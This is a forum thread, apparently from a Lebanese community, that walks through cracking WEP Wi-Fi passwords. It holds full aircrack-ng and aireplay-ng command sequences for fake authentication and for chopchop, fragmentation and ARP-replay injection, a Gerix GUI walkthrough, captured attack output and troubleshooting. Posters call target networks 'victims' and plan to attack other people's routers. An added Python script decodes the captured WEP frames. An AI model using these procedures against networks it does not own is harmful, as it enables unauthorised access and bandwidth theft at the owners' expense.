  • WEP and WPA pass cracking! Full Tutorial.

You need to wait till you get more IVs.
Wait till it gets to 30-40k IVs and then try the last step.
Hello,

It's actually a nice tutorial; I've been working on getting it to work for a month with no luck!
I have a question: sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" it says wrong channel, so I keep doing it till it goes to the right channel. Is this normal, or does it affect the process in any way?

And I have a problem on step 8; I'm getting

root@bt:~# aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1
20:35:27 Waiting for beacon frame (BSSID: 00:26:44:26:D7:DF) on channel 6
Read 1598 packets...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:26:44:26:D7:DF
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:26:44:26:D7:DE

0x0000: 0862 0000 ffff ffff ffff 0026 4426 d7df .b.........&D&..
0x0010: 0026 4426 d7de 2053 1f4f 8d00 a3e4 278f .&D&.. S.O....'.
0x0020: f4b2 cbc5 54f8 66f1 5f35 e5db c0f7 4c86 ....T.f._5....L.
0x0030: 1b3d 3c91 a20c d405 c0ba 8131 30f3 4201 .=<........10.B.
0x0040: 7810 7e8c x.~.

Use this packet ? y

Read 1608 packets...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:26:44:26:D7:DF
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:26:44:26:D7:DE

0x0000: 0842 0000 ffff ffff ffff 0026 4426 d7df .B.........&D&..
0x0010: 0026 4426 d7de 5053 224f 8d00 3b8b bec5 .&D&..PS"O..;...
0x0020: cc1d b5b5 e914 c6b1 8524 c31f 1437 1543 .........$...7.C
0x0030: ee56 00e8 3582 c217 9884 ddab 81f0 5c33 .V..5.........\3
0x0040: 63ad 215a c.!Z

Use this packet ? y

Saving chosen packet in replay_src-0809-203819.cap

got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
Sent 7379 packets, current guess: B6...

The chopchop attack appears to have failed. Possible reasons:



Why is it failing after 2 successes? (It happened twice before, after 1 successful packet.) Can it be because of a low signal or something? It's a WEP wifi network.
And where can I find this "(.xor you received in the last step)"? Do I have to write y many times till I get this?

Sorry if I'm annoying; I thought this would be the best place to get help from, my country's peeps :D

Thanks in advance
@FOu4d try the fragmentation attack; it could be a low signal.
Do you have BT5?
There is an easier method without a single line of code. Begin with this, then try m0ei's method.

1- Run gerix-wifi-cracker-ng (it's pre-installed on BT5); it's under exploitation tools > wireless exploitation > wlan exploitation.
2- Go to the configuration tab. Click on your interface, then on enable/disable monitor mode. A new interface will appear.
3- Click on the new interface and set a random MAC address.
4- Select all channels and click rescan.
5- Highlight the network whose password you want to crack.
6- Go to the WEP tab and click start sniffing and logging.
7- Since CC didn't work for you, I'll use the fragmentation attack. Click on associate with fake AP using fake auth. After you click it, OPN will appear in the terminal opened before.
8- Click on fragmentation attack, then type y in the terminal.
9- Click create the ARP packet to be injected on the victim access point.
10- Now inject it by clicking on inject the created packet. Wait until it reaches about 15000 and stop it.
11- Go to the cracking tab and click on aircrack-ng decrypt WEP password.
a new terminal will open.
Key Found!

If you have further questions, install my Android app; download it from this link (it's not published on the Play Store):
http://sdrv.ms/LHSOkc
"I have a question: sometimes when doing "aireplay-ng -4 -b 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" or "aireplay-ng -1 0 -a 00:26:44:26:D7:DF -h 00:25:86:e7:40:7c wlan1" it says wrong channel, so I keep doing it till it goes to the right channel. Is this normal, or does it affect the process in any way?"
I think your problem is that you are not using aireplay-ng on the right channel, because the channel sometimes changes. One way to know is to open a new terminal window and use airodump-ng to see all the networks so you can find your victim's new channel, then retry aireplay-ng with the channel you found.
Hello Roudy,

Thanks for this awesome method with a great tutorial! Much appreciated!

Even though I had some problems with deauthentication after clicking y on the 1 packet to use, I managed to make it work and get "saving keystream in .... .xor" with different wifi networks.

After that I did the next step and got

"Saving chosen packet in replay.... .cap"
"You should also start airodump-ng to capture replies."

"End of file."

So after that I went to the last step in the cracking tab and clicked on "aircrack-ng - Decrypt WEP Password".
It opens a terminal and starts testing keys, then it stops and nothing happens, and I don't get "Key Found!" (I closed the terminal and clicked it again and the same thing happened, but with a different number of tested keys and IVs.)

Please take a look at my screenshots!

Screen 1:

Screen 2:
So I guess I'm stuck at the last step. Any idea why this is happening?

Thanks..
OK, so your problem is with injecting the created packet.
In the first screenshot, does OPN appear in the top left terminal? (It's next to CIPHER.) Make sure it appears before you continue.
Retry the tutorial and tell me what you get.
Note that if one step is skipped or didn't work, all the cracking will fail.
Also make sure you clean old files before you start any task; this can be done by clicking clean old files in the configuration tab.
Hope it helps!
Question: how can I identify my wireless card, and how do I know if it supports injection?
Rodster wrote: Question: how can I identify my wireless card, and how do I know if it supports injection?
Open gerix wifi cracker as I said before. Go to the configuration tab; if anything appears under interfaces then your card is supported. If nothing appears then it's not supported.
Roudykh wrote:
Rodster wrote: Question: how can I identify my wireless card, and how do I know if it supports injection?
Open gerix wifi cracker as I said before. Go to the configuration tab; if anything appears under interfaces then your card is supported. If nothing appears then it's not supported.
But that application exists in BackTrack; I am running Windows. I want to check before I download it.
Well, I'm stupid :P I kept refreshing the page waiting for your reply and didn't notice it went to page 2 :P

Anyway, I tested again, tested both methods, CC and fragmentation, and it seems the problem is that after clicking either "Start the CC attack" or "Fragmentation attack" it first reads the packet and I type y; after that it fails to send the packet and keeps getting deauthentication packets.

BTW the injection test works great and says "Injection is Working!" (using my USB adapter).

Check this screenshot for the fragmentation method:

And this screenshot is for the CC method:
And I have some questions, if you don't mind:

1) Sometimes when I enable wlan0, which is my USB WiFi adapter TP-LINK WN321G (Ralink 2573 with driver rt73usb), and press rescan networks, I get no networks, so I keep enabling and disabling it to get networks. But when I enable my network card (Atheros AR2425 with driver ath5k) and scan networks on it, I get all WiFi networks directly. Can the problem be caused by my USB adapter? (Injection works on my USB adapter, and I'm not sure if it does on my network card :/)

2) I have a TP-Link router without any connection on it. If I set it to WEP WiFi, will I be able to crack it, or does it have to be connected to the internet? It might be better testing the process on a closer WiFi network.

3) I'm doing the attack on my laptop, but I have a PC. Would you suggest trying the attack from the PC, or doesn't it matter?

I'm so frustrated and want to be able to get it to work and see the sentence "Key Found!" :P
I really appreciate your help. Thanks!
Rodster wrote:
Roudykh wrote:
Rodster wrote: Question: how can I identify my wireless card, and how do I know if it supports injection?
Open gerix wifi cracker as I said before. Go to the configuration tab; if anything appears under interfaces then your card is supported. If nothing appears then it's not supported.
But that application exists in BackTrack; I am running Windows. I want to check before I download it.
Check whether your adapter is listed at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers&DokuWiki=5205d8e2201d6f3161d5e4d4060c1fe5#compatibility
@F0u4d 1) It doesn't matter whether you do injection with your internal card or the external adapter, because from your screenshots it appears that your USB adapter supports injection.
2) Yes, try to do the process on your router; it's better to get a good signal. It doesn't matter if there's internet or not.
3) It doesn't matter unless you're cracking WPA (it needs good RAM and CPU speed to do the process quickly).

OK then, retry the process but substitute step 7 from my tutorial with step 6 from m0ei's. (It appears the MAC address isn't associated with the fake AP.)

Note that sometimes it doesn't work the first time, so be patient.

Hope it helps!
OK, so I used step 6 instead of your step 7, which is before the fragmentation attack or CC.
When I first wrote the command as m0ei wrote it I got an error; then they mentioned adding --ignore-negative-one and it worked...
But the problem is still the same on the next step.



So that's really weird :/
I added you on the email you provided at the forums here @outlook.com... if you don't mind adding me.
You shouldn't ignore the negative one; negatives mean fake.
Try to add the ESSID in the command (the name of the network as it appears).
It's weird indeed! Sometimes I get this problem, but I retry it and everything goes well.
Yeah, I renamed my Hotmail to the new Outlook; you should give it a try, Metro UI (or should I say Win8 UI).
Nah, I don't mind; feel free to ask any question.
I added you on your e-mail Roudy_Kh@outlook.com from my e-mail Fouad.Raheb@hotmail.com.
I'll be online if you have time later to accept me, so I can stop annoying people here and annoy you in private lol

BTW I first tried adding the ESSID and it was the same, so in the next try I removed it.

Thanks!
I'll add you.
But we need some help here, guys!
It just works for me; I don't know why it didn't work for you.
Some help please...
case cancelled
Hey roudy!

I finally succeeded in cracking my own TP-Link router, set to WEP with the key "hello", using the following process:

1) airmon-ng [check available wireless cards]
2) airmon-ng start wlan0 [enable the card in monitor mode]
3) airodump-ng mon0 [check the available wifi networks]
4) airodump-ng -c (channel) -w (saving file name, for example "wep") --bssid (bssid of the target) mon0
5) New terminal: aireplay-ng -1 0 -a (bssid) mon0 [Association successful]
6) aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid) mon0 [Reading packets... use this packet? write "y" and hit enter... sent packet] [capturing data should speed up]
7) New terminal: aircrack-ng -n (key length 64/128/256... can be skipped) -b (bssid) (saved file, e.g. wep-01.cap)
Key Found!

I found some steps in a YouTube video, which I merged with some commands I had, and it worked :D

Now I will be trying it on some other routers; I hope it works :)
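Added example (not code from this thread, from m0ei's or Roudy's method, or from the aircrack-ng project): the aireplay-ng output in the earlier post prints each candidate packet as a raw hex dump, and step 6 of the procedure above passes "-p 0841" to aireplay-ng. Both are nothing more than the 802.11 data-frame header and the WEP fields behind it, so the script below decodes the two dumps from that post (re-typed here as constructed input) and the 0841 frame-control word, showing where "FromDS: 1, ToDS: 0 (WEP)", the BSSID/Dest/Source labels, the sequence number, the 24-bit WEP IV and the key index come from, and flags IV reuse between frames. Field offsets and flag bit positions are the standard IEEE 802.11 ones; the function and class names are my own.

```python
"""Decode the 802.11 WEP data frames from the aireplay-ng dump in this thread.

Added example, not part of the thread or of aircrack-ng. Byte offsets follow the
IEEE 802.11 data-frame layout: 2-byte frame control, 2-byte duration, three
6-byte addresses, 2-byte sequence control, then (for a protected WEP frame)
3-byte IV, 1 byte key index/pad, ciphertext and a 4-byte ICV.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# The two packets aireplay-ng offered in the earlier post, re-typed from the
# hex dump (constructed input; the ASCII column is dropped).
FRAME_1 = bytes.fromhex(
    "0862 0000 ffff ffff ffff 0026 4426 d7df "
    "0026 4426 d7de 2053 1f4f 8d00 a3e4 278f "
    "f4b2 cbc5 54f8 66f1 5f35 e5db c0f7 4c86 "
    "1b3d 3c91 a20c d405 c0ba 8131 30f3 4201 "
    "7810 7e8c"
)
FRAME_2 = bytes.fromhex(
    "0842 0000 ffff ffff ffff 0026 4426 d7df "
    "0026 4426 d7de 5053 224f 8d00 3b8b bec5 "
    "cc1d b5b5 e914 c6b1 8524 c31f 1437 1543 "
    "ee56 00e8 3582 c217 9884 ddab 81f0 5c33 "
    "63ad 215a"
)

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}


def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def decode_fc(word: int) -> Dict[str, object]:
    """Decode a frame-control word written the way the dump (and aireplay-ng -p)
    shows it: "0841" means byte 0 = 0x08, byte 1 = 0x41."""
    fc0, fc1 = (word >> 8) & 0xFF, word & 0xFF
    return {
        "type": FRAME_TYPES[(fc0 >> 2) & 0x3],
        "subtype": fc0 >> 4,
        "to_ds": bool(fc1 & 0x01),
        "from_ds": bool(fc1 & 0x02),
        "retry": bool(fc1 & 0x08),
        "more_data": bool(fc1 & 0x20),
        "protected": bool(fc1 & 0x40),  # the "WEP" flag in the dump
    }


@dataclass
class WepFrame:
    fc: Dict[str, object]
    addr1: str
    addr2: str
    addr3: str
    seq_num: int
    frag_num: int
    iv: Optional[bytes]        # 24-bit WEP IV, sent in the clear
    key_index: Optional[int]   # which of the 4 WEP keys (top 2 bits of the pad byte)
    ciphertext: bytes          # RC4(IV || key) XOR plaintext, ICV excluded
    icv: Optional[bytes]       # encrypted CRC-32 of the plaintext


def parse_frame(frame: bytes) -> WepFrame:
    if len(frame) < 24:
        raise ValueError("shorter than a minimal 802.11 data header")
    fc = decode_fc(int.from_bytes(frame[0:2], "big"))
    if fc["type"] != "data":
        raise ValueError(f"not a data frame: {fc['type']}")
    hdr_len = 24
    if fc["to_ds"] and fc["from_ds"]:
        hdr_len += 6            # WDS frames carry a fourth address
    if fc["subtype"] & 0x8:
        hdr_len += 2            # QoS data frames carry a QoS control field
    seq_ctrl = int.from_bytes(frame[22:24], "little")
    body = frame[hdr_len:]
    iv = key_index = icv = None
    if fc["protected"]:
        if len(body) < 8:
            raise ValueError("protected frame too short for IV + ICV")
        iv, key_index, icv = body[0:3], body[3] >> 6, body[-4:]
        body = body[4:-4]
    return WepFrame(fc, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]),
                    seq_ctrl >> 4, seq_ctrl & 0xF, iv, key_index, body, icv)


def roles(f: WepFrame) -> Dict[str, str]:
    """Map addr1..3 to dst/src/bssid the way aireplay-ng labels them; which
    slot means what depends on the ToDS/FromDS bits."""
    to_ds, from_ds = f.fc["to_ds"], f.fc["from_ds"]
    if from_ds and not to_ds:      # AP -> station (the frames in the dump)
        return {"dst": f.addr1, "bssid": f.addr2, "src": f.addr3}
    if to_ds and not from_ds:      # station -> AP (what -p 0841 forges)
        return {"bssid": f.addr1, "src": f.addr2, "dst": f.addr3}
    if not to_ds and not from_ds:  # ad hoc / IBSS
        return {"dst": f.addr1, "src": f.addr2, "bssid": f.addr3}
    raise ValueError("WDS frame: four-address form not handled here")


def iv_reuse(frames: List[bytes]) -> Dict[bytes, List[int]]:
    """Return IVs seen in more than one frame with their sequence numbers.
    The 24-bit IV space is why WEP leaks keystream: reuse is inevitable."""
    seen: Dict[bytes, List[int]] = defaultdict(list)
    for raw in frames:
        f = parse_frame(raw)
        if f.iv is not None:
            seen[f.iv].append(f.seq_num)
    return {iv: seqs for iv, seqs in seen.items() if len(seqs) > 1}


if __name__ == "__main__":
    for raw in (FRAME_1, FRAME_2):
        f = parse_frame(raw)
        print(f"Size: {len(raw)}, FromDS: {int(f.fc['from_ds'])}, "
              f"ToDS: {int(f.fc['to_ds'])}, seq={f.seq_num}, "
              f"IV={f.iv.hex()} keyidx={f.key_index}, {roles(f)}")
    print("-p 0841 means:", decode_fc(0x0841))
    print("IV reuse:", iv_reuse([FRAME_1, FRAME_2, FRAME_1]))
```

Run against the two dumps this reproduces aireplay-ng's "FromDS: 1, ToDS: 0 (WEP)" line and its BSSID/Dest/Source labels, and shows that 0x0841 is the same header with ToDS set instead of FromDS, i.e. a protected data frame that looks like it comes from a client and goes to the AP, which is why the replayed packet gets relayed and produces fresh IVs.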
I can crack wap and wep in 3 min, but for a real-world example you need to crack WPA2. Who's stupid enough these days to use wap or wep?
someone wrote: who's stupid enough these days to use wap or wep?
Well, there are plenty of Ogero modems with default WEP passwords that can be cracked instantly (with programs or manually), but I don't blame the public, since not everyone knows the technicalities of wireless encryption. Ogero did set up a small tutorial on how to change the passkey of the modem, but I wonder if they are still giving new customers modems with default WEP passwords, because as we all know bandwidth is a sacred thing here, and if someone feels like playing the leeching game someone else is going to pay a hefty price.